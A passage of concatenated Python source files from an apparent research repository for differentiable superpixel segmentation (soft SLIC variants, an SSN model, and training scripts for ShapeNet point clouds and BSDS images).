num_spixels_width, num_spixels_height) # affinity_matrix = (-dist_matrix).softmax(1) # reshaped_affinity_matrix = affinity_matrix.reshape(-1) # mask = (abs_indices[1] >= 0) * (abs_indices[1] < num_spixels) # sparse_abs_affinity = torch.sparse_coo_tensor(abs_indices[:, mask], reshaped_affinity_matrix[mask]) # abs_affinity = sparse_abs_affinity.to_dense().contiguous() # spixel_features = torch.bmm(abs_affinity, permuted_pixel_features) \ # / (abs_affinity.sum(2, keepdim=True) + 1e-16) # spixel_features = spixel_features.permute(0, 2, 1).contiguous() # hard_labels = get_hard_abs_labels(affinity_matrix, init_label_map, num_spixels_width) # return abs_affinity, hard_labels, spixel_features def soft_slic_all(point, seed, n_iter=10, k_faces=8): """ soft slic with all points entering computation Args: point (Tensor): import feature seed (Tensor): facet center n_iter (int, optional): number of ssn iter. Defaults to 10. k_facets (int, optional): Dummy API,never mind Returns: [type]: [description] """ for _ in range(n_iter): dist_matrix = point.new(point.shape[0], seed.shape[-1], point.shape[-1]).zero_() for i in range(seed.shape[-1]): initials = seed[:, :, i].unsqueeze(-1).repeat(1, 1, point.shape[-1]) dist_matrix[:, i, :] = -(pairwise_distance(point, initials) * pairwise_distance(point, initials)) QT = dist_matrix.softmax(1) seed = (torch.bmm(QT, point.permute(0, 2, 1)) / QT.sum(2, keepdim=True)).permute(0, 2, 1) _, hard_label = QT.permute(0, 2, 1).max(-1) return QT, hard_label, seed, point def soft_slic_knn(point, seed, n_iter=10, k_facets=8): """ soft slic with knn implemented by pytorch catch k adjacent spixs around selected center Args: point (Tensor): import feature seed (Tensor): facet center n_iter (int, optional): number of ssn iter. Defaults to 10. k_facets (int, optional): number of nearst facets knn chosed. Defaults to 4. """ def soft_slic_all_single(point, seed): dist_matrix = point.new(point.shape[0], seed.shape[-1], point.shape[-1]).zero_() for i in range(seed.shape[-1]): initials = seed[:, :, i].unsqueeze(-1).repeat(1, 1, point.shape[-1]) dist_matrix[:, i, :] = -(pairwise_distance(point, initials) * pairwise_distance(point, initials)) QT = dist_matrix.softmax(1) _, hard_label = QT.permute(0, 2, 1).max(-1) return hard_label B, C, N = point.shape #select knn functions if point.device == 'cpu': knn = knn_indices_func_cpu else: knn = knn_indices_func_gpu #calculate initial superpixels # traditional k-means based #print("knn slic start") hard_label = soft_slic_all_single(point, seed) for iter in range(n_iter): dist_matrix = point.new(point.shape[0], seed.shape[-1], point.shape[-1]).zero_() NearstFacetsIdx = knn(seed, seed, k_facets) #batchwise operation->fvck for batch_idx in range(B): for seed_i in range(seed.shape[-1]): mask = hard_label[batch_idx] == seed_i for _, nearst in enumerate(NearstFacetsIdx[batch_idx, seed_i]): mask |= hard_label[batch_idx] == nearst pointt = point[batch_idx, :, mask].permute(1, 0) seeed = seed[batch_idx, :, seed_i].unsqueeze(0).repeat(pointt.shape[0], 1) dist = pairwise_distance(pointt, seeed) Q_part = (-dist.pow(2)).softmax(-1) dist_matrix[batch_idx, seed_i, mask] = Q_part seed = (torch.bmm(dist_matrix, point.permute(0, 2, 1)) / dist_matrix.sum(2, keepdim=True)).permute(0, 2, 1) _, hard_label = dist_matrix.permute(0, 2, 1).max(-1) return dist_matrix, hard_label, seed, point def soft_slic_pknn(point, seed, n_iter=10, k_point=128): """ soft slic implemented using knn catch k adjacent pix around center Args: point (Tensor): point feature seed (Tensor): original spix center n_iter (int, optional): n slic iters . Defaults to 10. k_facets (int, optional): k nearst points. Defaults to 256. Returns: [type]: [description] """ B, C, N = point.shape #select knn functions if point.device == 'cpu': knn = knn_indices_func_cpu else: knn = knn_indices_func_gpu for _ in range(n_iter): dist_matrix = point.new(B, seed.shape[-1], point.shape[-1]).zero_() NearstFacetsIdx = knn(seed, point, k_point) # pointt = torch.stack([torch.stack([x[:, idxxx] for idxxx in idxx], dim=1) for idxx, x in zip(NearstFacetsIdx, point)]) pointt = torch.stack( [x[:, idxx] for idxx, x in zip(NearstFacetsIdx, point)]) # print(pointt.shape) packed_seed = seed.unsqueeze(-1).expand([-1, -1, -1, k_point]) dist = pairwise_distance(packed_seed, pointt) # print(dist.shape) QT_part = (-dist.pow(2)).softmax(-1) for i in range(dist_matrix.shape[0]): for j in range(dist_matrix.shape[1]): dist_matrix[i, j, NearstFacetsIdx[i, j]] = QT_part[i, j] seed = (torch.bmm(dist_matrix, point.permute(0, 2, 1)) / (dist_matrix.sum(2, keepdim=True) + 1e-16)).permute(0, 2, 1) _, hard_label = dist_matrix.permute(0, 2, 1).max(-1) return dist_matrix, hard_label, seed, point ``` #### File: aabbcco/ssn-3d-pytorch/model.py ```python import torch import torch.nn as nn from lib.ssn.ssn import ssn_iter, sparse_ssn_iter def conv_bn_relu(in_c, out_c): return nn.Sequential( nn.Conv2d(in_c, out_c, 3, padding=1, bias=False), nn.BatchNorm2d(out_c), nn.ReLU(True) ) class SSNModel(nn.Module): def __init__(self, feature_dim, nspix, n_iter=10): super().__init__() self.nspix = nspix self.n_iter = n_iter self.scale1 = nn.Sequential( conv_bn_relu(5, 64), conv_bn_relu(64, 64) ) self.scale2 = nn.Sequential( nn.MaxPool2d(3, 2, padding=1), conv_bn_relu(64, 64), conv_bn_relu(64, 64) ) self.scale3 = nn.Sequential( nn.MaxPool2d(3, 2, padding=1), conv_bn_relu(64, 64), conv_bn_relu(64, 64) ) self.output_conv = nn.Sequential( nn.Conv2d(64*3+5, feature_dim-5, 3, padding=1), nn.ReLU(True) ) for m in self.modules(): if isinstance(m, nn.Conv2d): nn.init.normal_(m.weight, 0, 0.001) if m.bias is not None: nn.init.constant_(m.bias, 0) def forward(self, x): pixel_f = self.feature_extract(x) if self.training: return ssn_iter(pixel_f, self.nspix, self.n_iter) else: return sparse_ssn_iter(pixel_f, self.nspix, self.n_iter) def feature_extract(self, x): s1 = self.scale1(x) s2 = self.scale2(s1) s3 = self.scale3(s2) s2 = nn.functional.interpolate(s2, size=s1.shape[-2:], mode="bilinear", align_corners=False) s3 = nn.functional.interpolate(s3, size=s1.shape[-2:], mode="bilinear", align_corners=False) cat_feat = torch.cat([x, s1, s2, s3], 1) feat = self.output_conv(cat_feat) return torch.cat([feat, x], 1) ``` #### File: ssn-3d-pytorch/trainfile/lmfeam_shapenet.py ```python import os import math import numpy as np import time import torch from torch.nn import Module import torch.optim as optim from torch.utils.data import DataLoader from tensorboardX import SummaryWriter import sys sys.path.append(os.path.dirname("../")) from lib.utils.meter import Meter from lib.dataset import shapenet from lib.utils.pointcloud_io import CalAchievableSegAccSingle, CalUnderSegErrSingle from lib.utils.loss import reconstruct_loss_with_cross_etnropy, reconstruct_loss_with_mse from lib.MEFEAM.MEFEAM import discriminative_loss, LMFEAM, sample_and_group_query_ball from lib.ssn.ssn import soft_slic_all, soft_slic_pknn class LMFEAM_SSN(Module): def __init__(self, feature_dim, nspix, mfem_dim=6, n_iter=10, RGB=False, normal=False, backend=soft_slic_all): super().__init__() self.nspix = nspix self.n_iter = n_iter self.channel = 3 self.backend = backend if RGB: self.channel += 3 if normal: self.channel += 3 #[32, 64], [128, 128], [64, mfem_dim], 32,3 , [0.2, 0.4, 0.6] self.lmfeam = LMFEAM([32, 64], [128, 128], [64, mfem_dim], [128, 64, feature_dim], 32, self.channel, point_scale=[0.2, 0.4, 0.6], grouping=sample_and_group_query_ball) def forward(self, x): feature, msf = self.lmfeam(x) return self.backend(feature, feature[:, :, :self.nspix], self.n_iter), msf @torch.no_grad() def eval(model, loader, pos_scale, device): model.eval() # change the mode of model to eval sum_asa = 0 sum_usa = 0 cnt = 0 for data in loader: cnt += 1 inputs, labels, labels_num = data # b*c*npoint inputs = inputs.to(device) # b*c*w*h #labels = labels.to(device) # sematic_lable inputs = pos_scale * inputs # calculation,return affinity,hard lable,feature tensor (Q, H, _, _), msf_feature = model(inputs) H = H.squeeze(0).to("cpu").detach().numpy() labels_num = labels_num.squeeze(0).numpy() asa = CalAchievableSegAccSingle(H, labels_num) usa = CalUnderSegErrSingle(H, labels_num) sum_asa += asa sum_usa += usa if (100 == cnt): break model.train() asaa = sum_asa / 100.0 usaa = sum_usa / 100.0 strs = "[test]:asa: {:.5f},ue: {:.5f}".format(asaa, usaa) print(strs) return asaa, usaa # cal asa def update_param(data, model, optimizer, compactness, pos_scale, device, disc_loss): inputs, labels, labels_num = data inputs = inputs.to(device) labels = labels.to(device) inputs = pos_scale * inputs (Q, H, _, _), msf_feature = model(inputs) recons_loss = reconstruct_loss_with_cross_etnropy(Q, labels) compact_loss = reconstruct_loss_with_mse(Q, inputs, H) disc = disc_loss(msf_feature, labels_num) #uniform_compactness = uniform_compact_loss(Q,coords.reshape(*coords.shape[:2], -1), H,device=device) loss = recons_loss + compactness * compact_loss optimizer.zero_grad() # clear previous grad loss.backward() # cal the grad optimizer.step() # backprop return { "loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item(), "disc": disc.item() } def train(cfg): if torch.cuda.is_available(): device = "cuda" else: device = "cpu" model = LMFEAM_SSN(10, 50, backend=soft_slic_pknn).to(device) disc_loss = discriminative_loss(0.1, 0.1) optimizer = optim.Adam(model.parameters(), cfg.lr) train_dataset = shapenet.shapenet(cfg.root) train_loader = DataLoader(train_dataset, cfg.batchsize, shuffle=True, drop_last=True, num_workers=cfg.nworkers) test_dataset = shapenet.shapenet(cfg.root, split="test") test_loader = DataLoader(test_dataset, 1, shuffle=False, drop_last=False) meter = Meter() iterations = 0 writer = SummaryWriter(log_dir= cfg.out_dir, comment='traininglog') for epoch_idx in range(cfg.train_epoch): batch_iterations = 0 for data in train_loader: iterations += 1 batch_iterations+=1 metric = update_param(data, model, optimizer, cfg.compactness, cfg.pos_scale, device, disc_loss) meter.add(metric) state = meter.state( f"[{batch_iterations},{epoch_idx}/{cfg.train_epoch}]") print(state) # return {"loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item()} writer.add_scalar("comprehensive/loss", metric["loss"], iterations) writer.add_scalar("loss/reconstruction_loss", metric["reconstruction"], iterations) writer.add_scalar("loss/compact_loss", metric["compact"], iterations) writer.add_scalar("loss/disc_loss", metric["disc"], iterations) if (iterations % 200) == 0: (asa, usa) = eval(model, test_loader, cfg.pos_scale, device) writer.add_scalar("test/asa", asa, iterations) writer.add_scalar("test/ue", usa, iterations) if (iterations % 1000) == 0: strs = "ep_{:}_batch_{:}_iter_{:}_asa_{:.3f}_ue_{:.3f}.pth".format(epoch_idx,batch_iterations,iterations,asa,usa) torch.save( model.state_dict(), os.path.join( cfg.out_dir, strs)) unique_id = str(int(time.time())) torch.save(model.state_dict(), os.path.join(cfg.out_dir, "model" + unique_id + ".pth")) if __name__ == "__main__": import argparse parser = argparse.ArgumentParser() parser.add_argument("--root", type=str, default='../shapenet_part_seg_hdf5_data', help="/ path/to/shapenet") parser.add_argument("--out_dir", default="./log_lmnfeam_pknn_ndisc", type=str, help="/path/to/output directory") parser.add_argument("--batchsize", default=16, type=int) parser.add_argument("--nworkers", default=8, type=int, help="number of threads for CPU parallel") parser.add_argument("--lr", default=1e-6, type=float, help="learning rate") parser.add_argument("--train_epoch", default=30, type=int) parser.add_argument("--fdim", default=10, type=int, help="embedding dimension") parser.add_argument("--niter", default=5, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=100, type=int, help="number of superpixels") parser.add_argument("--pos_scale", default=10, type=float) parser.add_argument("--compactness", default=1e-4, type=float) parser.add_argument("--test_interval", default=100, type=int) args = parser.parse_args() os.makedirs(args.out_dir, exist_ok=True) train(args) ``` #### File: ssn-3d-pytorch/trainfile/mfeam_shapenet-spix-disc.py ```python import os import math import numpy as np import time import torch import torch.optim as optim from torch.utils.data import DataLoader from tensorboardX import SummaryWriter import sys sys.path.append(os.path.dirname("../")) from lib.utils.meter import Meter from models.model_MNFEAM import MFEAM_SSN from lib.dataset.shapenet import shapenet_spix from lib.utils.loss import reconstruct_loss_with_cross_etnropy, reconstruct_loss_with_mse, uniform_compact_loss from lib.MEFEAM.MEFEAM import discriminative_loss @torch.no_grad() def eval(model, loader, pos_scale, device): def achievable_segmentation_accuracy(superpixel, label): """ Function to calculate Achievable Segmentation Accuracy: ASA(S,G) = sum_j max_i |s_j \cap g_i| / sum_i |g_i| Args: input: superpixel image (H, W), output: ground-truth (H, W) """ TP = 0 unique_id = np.unique(superpixel) for uid in unique_id: mask = superpixel == uid label_hist = np.histogram(label[mask]) maximum_regionsize = label_hist[0].max() TP += maximum_regionsize return TP / label.size model.eval() # change the mode of model to eval sum_asa = 0 for data in loader: inputs, labels = data # b*c*npoint inputs = inputs.to(device) # b*c*w*h labels = labels.to(device) # sematic_lable inputs = pos_scale * inputs # calculation,return affinity,hard lable,feature tensor Q, H, feat = model(inputs) asa = achievable_segmentation_accuracy( H.to("cpu").detach().numpy(), labels.to("cpu").numpy()) # return data to cpu sum_asa += asa model.train() return sum_asa / len(loader) # cal asa def update_param(data, model, optimizer, compactness, pos_scale, device, disc_loss): inputs, labels, _, spix = data inputs = inputs.to(device) labels = labels.to(device) inputs = pos_scale * inputs (Q, H, _, _), msf_feature = model(inputs) recons_loss = reconstruct_loss_with_cross_etnropy(Q, labels) compact_loss = reconstruct_loss_with_mse(Q, inputs, H) disc = disc_loss(msf_feature, spix) #uniform_compactness = uniform_compact_loss(Q,coords.reshape(*coords.shape[:2], -1), H,device=device) loss = recons_loss + compactness * compact_loss + disc optimizer.zero_grad() # clear previous grad loss.backward() # cal the grad optimizer.step() # backprop return { "loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item(), "disc": disc.item() } def train(cfg): if torch.cuda.is_available(): device = "cuda" else: device = "cpu" model = MFEAM_SSN(10, 50).to(device) disc_loss = discriminative_loss(0.1, 0.5) optimizer = optim.Adam(model.parameters(), cfg.lr) train_dataset = shapenet_spix(cfg.root) train_loader = DataLoader(train_dataset, cfg.batchsize, shuffle=True, drop_last=True, num_workers=cfg.nworkers) # test_dataset = shapenet.shapenet(cfg.root, split="test") # test_loader = DataLoader(test_dataset, 1, shuffle=False, drop_last=False) meter = Meter() iterations = 0 max_val_asa = 0 writer = SummaryWriter(log_dir='log', comment='traininglog') while iterations < cfg.train_iter: for data in train_loader: iterations += 1 metric = update_param(data, model, optimizer, cfg.compactness, cfg.pos_scale, device, disc_loss) meter.add(metric) state = meter.state(f"[{iterations}/{cfg.train_iter}]") print(state) # return {"loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item()} writer.add_scalar("comprehensive/loss", metric["loss"], iterations) writer.add_scalar("loss/reconstruction_loss", metric["reconstruction"], iterations) writer.add_scalar("loss/compact_loss", metric["compact"], iterations) writer.add_scalar("loss/disc_loss", metric["disc"], iterations) if (iterations % 1000) == 0: torch.save( model.state_dict(), os.path.join(cfg.out_dir, "model_iter" + str(iterations) + ".pth")) # if (iterations % cfg.test_interval) == 0: # asa = eval(model, test_loader, cfg.pos_scale, device) # print(f"validation asa {asa}") # writer.add_scalar("comprehensive/asa", asa, iterations) # if asa > max_val_asa: # max_val_asa = asa # torch.save(model.state_dict(), os.path.join( # cfg.out_dir, "bset_model_sp_loss.pth")) if iterations == cfg.train_iter: break unique_id = str(int(time.time())) torch.save(model.state_dict(), os.path.join(cfg.out_dir, "model" + unique_id + ".pth")) if __name__ == "__main__": import argparse parser = argparse.ArgumentParser() parser.add_argument("--root", type=str, default='../shapenet_partseg_spix', help="/ path/to/shapenet") parser.add_argument("--out_dir", default="./log", type=str, help="/path/to/output directory") parser.add_argument("--batchsize", default=8, type=int) parser.add_argument("--nworkers", default=8, type=int, help="number of threads for CPU parallel") parser.add_argument("--lr", default=1e-6, type=float, help="learning rate") parser.add_argument("--train_iter", default=10000, type=int) parser.add_argument("--fdim", default=10, type=int, help="embedding dimension") parser.add_argument("--niter", default=5, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=50, type=int, help="number of superpixels") parser.add_argument("--pos_scale", default=10, type=float) parser.add_argument("--compactness", default=1e-4, type=float) parser.add_argument("--test_interval", default=100, type=int) args = parser.parse_args() os.makedirs(args.out_dir, exist_ok=True) train(args) ``` #### File: ssn-3d-pytorch/trainfile/train_universe-mfa.py ```python import os import time import torch import torch.optim as optim from torch.utils.data import DataLoader from tensorboardX import SummaryWriter import sys sys.path.append(os.path.dirname("../")) from lib.utils.meter import Meter from lib.ssn.ssn import soft_slic_pknn from lib.dataset import shapenet from lib.MEFEAM.MEFEAM import discriminative_loss from models.MFA_ptnet import * def train(cfg): if torch.cuda.is_available(): device = "cuda" else: device = "cpu" model = MfaPtnetSsn(cfg.fdim, cfg.nspix, cfg.niter, backend=soft_slic_pknn).to(device) disc_loss = discriminative_loss(0.1, 0.5) optimizer = optim.Adam(model.parameters(), cfg.lr) train_dataset = shapenet.shapenet(cfg.root) train_loader = DataLoader(train_dataset, cfg.batchsize, shuffle=True, drop_last=True, num_workers=cfg.nworkers) test_dataset = shapenet.shapenet(cfg.root, split="test") test_loader = DataLoader(test_dataset, 1, shuffle=False, drop_last=False) meter = Meter() iterations = 0 writer = SummaryWriter(log_dir=cfg.out_dir, comment='traininglog') for epoch_idx in range(cfg.train_epoch): batch_iterations = 0 for data in train_loader: batch_iterations += 1 iterations += 1 metric = update_param(data, model, optimizer, cfg.compactness, cfg.pos_scale, device) meter.add(metric) state = meter.state( f"[{batch_iterations},{epoch_idx}/{cfg.train_epoch}]") print(state) addscaler(metric, writer, iterations) if (iterations % 200) == 0: test_res = eval(model, test_loader, cfg.pos_scale, device) addscaler(test_res, writer, iterations, True) if (iterations % 1000) == 0: (asa, usa) = test_res strs = "ep_{:}_batch_{:}_iter_{:}_asa_{:.3f}_ue_{:.3f}.pth".format( epoch_idx, batch_iterations, iterations, asa, usa) torch.save(model.state_dict(), os.path.join(cfg.out_dir, strs)) unique_id = str(int(time.time())) torch.save(model.state_dict(), os.path.join(cfg.out_dir, "model" + unique_id + ".pth")) if __name__ == "__main__": import argparse parser = argparse.ArgumentParser() parser.add_argument("--root", type=str, default='../shapenet_partseg_inst', help="/ path/to/shapenet") parser.add_argument("--out_dir", default="./log_mfa_inst", type=str, help="/path/to/output directory") parser.add_argument("--batchsize", default=8, type=int) parser.add_argument("--nworkers", default=8, type=int, help="number of threads for CPU parallel") parser.add_argument("--lr", default=1e-4, type=float, help="learning rate") parser.add_argument("--train_epoch", default=30, type=int) parser.add_argument("--fdim", default=10, type=int, help="embedding dimension") parser.add_argument("--niter", default=10, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=50, type=int, help="number of superpixels") parser.add_argument("--pos_scale", default=10, type=float) parser.add_argument("--compactness", default=1e-4, type=float) parser.add_argument("--test_interval", default=100, type=int) args = parser.parse_args() os.makedirs(args.out_dir, exist_ok=True) train(args) ``` #### File: aabbcco/ssn-3d-pytorch/train.py ```python import os, math import numpy as np import time import torch import torch.optim as optim from torch.utils.data import DataLoader from tensorboardX import SummaryWriter from lib.utils.meter import Meter from model import SSNModel from lib.dataset import bsds, augmentation from lib.utils.loss import reconstruct_loss_with_cross_etnropy, reconstruct_loss_with_mse,uniform_compact_loss @torch.no_grad() def eval(model, loader, color_scale, pos_scale, device): def achievable_segmentation_accuracy(superpixel, label): """ Function to calculate Achievable Segmentation Accuracy: ASA(S,G) = sum_j max_i |s_j \cap g_i| / sum_i |g_i| Args: input: superpixel image (H, W), output: ground-truth (H, W) """ TP = 0 unique_id = np.unique(superpixel) for uid in unique_id: mask = superpixel == uid label_hist = np.histogram(label[mask]) maximum_regionsize = label_hist[0].max() TP += maximum_regionsize return TP / label.size model.eval()#change the mode of model to eval sum_asa = 0 for data in loader: inputs, labels,_ = data#b*c*w*h inputs = inputs.to(device)#b*c*w*h labels = labels.to(device)#sematic_lable height, width = inputs.shape[-2:]#w*H nspix_per_axis = int(math.sqrt(model.nspix))#determine how much pix initiated in horizontal/vertical space pos_scale = pos_scale * max(nspix_per_axis / height, nspix_per_axis / width) #dont konw #add coords for each pixel,B*(C+2)*W*H coords = torch.stack(torch.meshgrid(torch.arange(height, device=device), torch.arange(width, device=device)), 0)#2*W*H? coords = coords[None].repeat(inputs.shape[0], 1, 1, 1).float()#whats the meaning of repeat?#B*2*W*H inputs = torch.cat([color_scale*inputs, pos_scale*coords], 1)#input data, B*(C+2(x,y))*W*H Q, H, feat = model(inputs)#calculation,return affinity,hard lable,feature tensor H = H.reshape(height, width) #B*(W*H)=>B*W*H labels = labels.argmax(1).reshape(height, width)#one hot to digit? asa = achievable_segmentation_accuracy(H.to("cpu").detach().numpy(), labels.to("cpu").numpy())#return data to cpu sum_asa += asa model.train() return sum_asa / len(loader) #cal asa def update_param(data, model, optimizer, compactness, color_scale, pos_scale, device): inputs, labels,_ = data inputs = inputs.to(device) labels = labels.to(device) height, width = inputs.shape[-2:] nspix_per_axis = int(math.sqrt(model.nspix))#determine the origion poisition of superpixel pos_scale = pos_scale * max(nspix_per_axis/height, nspix_per_axis/width) coords = torch.stack(torch.meshgrid(torch.arange(height, device=device), torch.arange(width, device=device)), 0) coords = coords[None].repeat(inputs.shape[0], 1, 1, 1).float() inputs = torch.cat([color_scale*inputs, pos_scale*coords], 1) Q, H, feat = model(inputs) recons_loss = reconstruct_loss_with_cross_etnropy(Q, labels) compact_loss = reconstruct_loss_with_mse(Q, coords.reshape(*coords.shape[:2], -1), H) #uniform_compactness = uniform_compact_loss(Q,coords.reshape(*coords.shape[:2], -1), H,device=device) loss = recons_loss + compactness * compact_loss optimizer.zero_grad()#clear previous grad loss.backward()#cal the grad optimizer.step()#backprop return {"loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item()} def train(cfg): if torch.cuda.is_available(): device = "cuda" else: device = "cpu" model = SSNModel(cfg.fdim, cfg.nspix, cfg.niter).to(device) optimizer = optim.Adam(model.parameters(), cfg.lr) augment = augmentation.Compose([augmentation.RandomHorizontalFlip(), augmentation.RandomScale(), augmentation.RandomCrop()]) train_dataset = bsds.BSDS(cfg.root, geo_transforms=augment) train_loader = DataLoader(train_dataset, cfg.batchsize, shuffle=True, drop_last=True, num_workers=cfg.nworkers) test_dataset = bsds.BSDS(cfg.root, split="val") test_loader = DataLoader(test_dataset, 1, shuffle=False, drop_last=False) meter = Meter() iterations = 0 max_val_asa = 0 writer = SummaryWriter(log_dir='log', comment='traininglog') while iterations < cfg.train_iter: for data in train_loader: iterations += 1 metric = update_param(data, model, optimizer, cfg.compactness, cfg.color_scale, cfg.pos_scale, device) meter.add(metric) state = meter.state(f"[{iterations}/{cfg.train_iter}]") print(state) # return {"loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item(),"uniform:":uniform_compactness.item()} writer.add_scalar("comprehensive/loss", metric["loss"], iterations) writer.add_scalar("loss/reconstruction_loss", metric["reconstruction"], iterations) writer.add_scalar("loss/compact_loss", metric["compact"], iterations) if (iterations % cfg.test_interval) == 0: asa = eval(model, test_loader, cfg.color_scale, cfg.pos_scale, device) print(f"validation asa {asa}") writer.add_scalar("comprehensive/asa",asa,iterations) if asa > max_val_asa: max_val_asa = asa torch.save(model.state_dict(), os.path.join(cfg.out_dir, "bset_model_sp_test.pth")) if iterations == cfg.train_iter: break unique_id = str(int(time.time())) torch.save(model.state_dict(), os.path.join(cfg.out_dir, "model"+unique_id+".pth")) if __name__ == "__main__": import argparse parser = argparse.ArgumentParser() parser.add_argument("--root", type=str,default='../BSR', help="/path/to/BSR") parser.add_argument("--out_dir", default="./log", type=str, help="/path/to/output directory") parser.add_argument("--batchsize", default=12, type=int) parser.add_argument("--nworkers", default=4, type=int, help="number of threads for CPU parallel") parser.add_argument("--lr",default=1e-4, type=float, help="learning rate") parser.add_argument("--train_iter", default=200000, type=int) parser.add_argument("--fdim", default=20, type=int, help="embedding dimension") parser.add_argument("--niter", default=5, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=100, type=int, help="number of superpixels") parser.add_argument("--color_scale", default=0.26, type=float) parser.add_argument("--pos_scale", default=2.5, type=float) parser.add_argument("--compactness", default=1e-4, type=float) parser.add_argument("--test_interval", default=100, type=int) args = parser.parse_args() os.makedirs(args.out_dir, exist_ok=True) train(args) ``` #### File: aabbcco/ssn-3d-pytorch/train_shapenetx.py ```python import os import numpy as np import time import torch import torch.optim as optim from torch.utils.data import DataLoader from tensorboardX import SummaryWriter from datetime import datetime from lib.utils.meter import Meter from lib.ssn.ssn import soft_slic_pknn from models.model_ptnet import PointNet_SSNx from lib.dataset import shapenet from lib.utils.loss import reconstruct_loss_with_cross_etnropy, reconstruct_loss_with_mse from lib.utils.pointcloud_io import CalAchievableSegAccSingle, CalUnderSegErrSingle @torch.no_grad() def eval(model, loader, pos_scale, device): model.eval() # change the mode of model to eval sum_asa = 0 sum_usa = 0 cnt = 0 for data in loader: cnt += 1 inputs, _, labels_num = data # b*c*npoint inputs = inputs.to(device) # b*c*w*h # labels = labels.to(device) # sematic_lable inputs = pos_scale * inputs # calculation,return affinity,hard lable,feature tensor _, H, _, _ = model(inputs) H = H.squeeze(0).to("cpu").detach().numpy() labels_num = labels_num.squeeze(0).numpy() asa = CalAchievableSegAccSingle(H, labels_num) usa = CalUnderSegErrSingle(H, labels_num) sum_asa += asa sum_usa += usa if (100 == cnt): break model.train() asaa = sum_asa / 100.0 usaa = sum_usa / 100.0 strs = "[test]:asa: {:.5f},ue: {:.5f}".format(asaa, usaa) print(strs) return asaa, usaa # cal asa def update_param(data, model, optimizer, compactness, pos_scale, device): inputs, labels, _ = data inputs = inputs.to(device) labels = labels.to(device) inputs = pos_scale * inputs Q, H, _, _ = model(inputs) recons_loss = reconstruct_loss_with_cross_etnropy(Q, labels) compact_loss = reconstruct_loss_with_mse(Q, inputs, H) #uniform_compactness = uniform_compact_loss(Q,coords.reshape(*coords.shape[:2], -1), H,device=device) loss = recons_loss + compactness * compact_loss optimizer.zero_grad() # clear previous grad loss.backward() # cal the grad optimizer.step() # backprop return { "loss": loss.item(), "reconstruction": recons_loss.item(), "compact": compact_loss.item(), "lr": optimizer.state_dict()['param_groups'][0]['lr'] } def train(cfg): if torch.cuda.is_available(): device = "cuda" else: device = "cpu" model = PointNet_SSNx(cfg.fdim, cfg.nspix, cfg.niter, backend=soft_slic_pknn).to(device) optimizer = optim.Adam(model.parameters(), cfg.lr) decayer = optim.lr_scheduler.StepLR(optimizer, 2, 0.95) train_dataset = shapenet.shapenet(cfg.root) train_loader = DataLoader(train_dataset, cfg.batchsize, shuffle=True, drop_last=True, num_workers=cfg.nworkers) test_dataset = shapenet.shapenet(cfg.root, split="test") test_loader = DataLoader(test_dataset, 1, shuffle=False, drop_last=False) meter = Meter() iterations = 0 writer = SummaryWriter(log_dir=args.out_dir, comment='traininglog') for epoch_idx in range(cfg.train_epoch): batch_iterations = 0 for data in train_loader: batch_iterations += 1 iterations += 1 metric = update_param(data, model, optimizer, cfg.compactness, cfg.pos_scale, device) meter.add(metric) state = meter.state( f"[{batch_iterations},{epoch_idx}/{cfg.train_epoch}]") print(state) addscaler(metric, writer, iterations) if (iterations % 200) == 0: test_res = eval(model, test_loader, cfg.pos_scale, device) addscaler(test_res, writer, iterations, True) if (iterations % 1000) == 0: (asa, usa) = test_res strs = "ep_{:}_batch_{:}_iter_{:}_asa_{:.3f}_ue_{:.3f}.pth".format( epoch_idx, batch_iterations, iterations, asa, usa) torch.save( model.state_dict(), os.path.join(args.out_dir, strs)) decayer.step() unique_id = str(int(time.time())) torch.save(model.state_dict(), os.path.join(cfg.out_dir, "model" + unique_id + ".pth")) unique_id = str(int(time.time())) torch.save(model.state_dict(), os.path.join(cfg.out_dir, "model" + unique_id + ".pth")) def addscaler(metric, scalarWriter, iterations, test=False): if not test: scalarWriter.add_scalar("comprehensive/loss", metric["loss"], iterations) scalarWriter.add_scalar("loss/reconstruction_loss", metric["reconstruction"], iterations) scalarWriter.add_scalar("loss/compact_loss", metric["compact"], iterations) scalarWriter.add_scalar("lr", metric["lr"], iterations) else: (asa, usa) = metric scalarWriter.add_scalar("eval/asa", asa, iterations) scalarWriter.add_scalar("eval/ue", usa, iterations) if __name__ == "__main__": import argparse parser = argparse.ArgumentParser() parser.add_argument("--root", type=str, default='../shapenet_part_seg_hdf5_data', help="/ path/to/shapenet") parser.add_argument("--out_dir", default="../ssn-logs/pointnetx-pknn-", type=str, help="/path/to/output directory") parser.add_argument("--batchsize", default=20, type=int) parser.add_argument("--nworkers", default=8, type=int, help="number of threads for CPU parallel") parser.add_argument("--lr", default=3e-5, type=float, help="learning rate") parser.add_argument("--train_epoch", default=100, type=int) parser.add_argument("--fdim", default=20, type=int, help="embedding dimension") parser.add_argument("--niter", default=10, type=int, help="number of iterations for differentiable SLIC") parser.add_argument("--nspix", default=50, type=int, help="number of superpixels") parser.add_argument("--pos_scale", default=10, type=float) parser.add_argument("--compactness", default=1e-4, type=float) parser.add_argument("--test_interval", default=100, type=int) args = parser.parse_args() date = datetime.now() os.makedirs(args.out_dir, exist_ok=True) train(args) ```
{ "source": "aabbcco/wows_bot", "score": 2 }
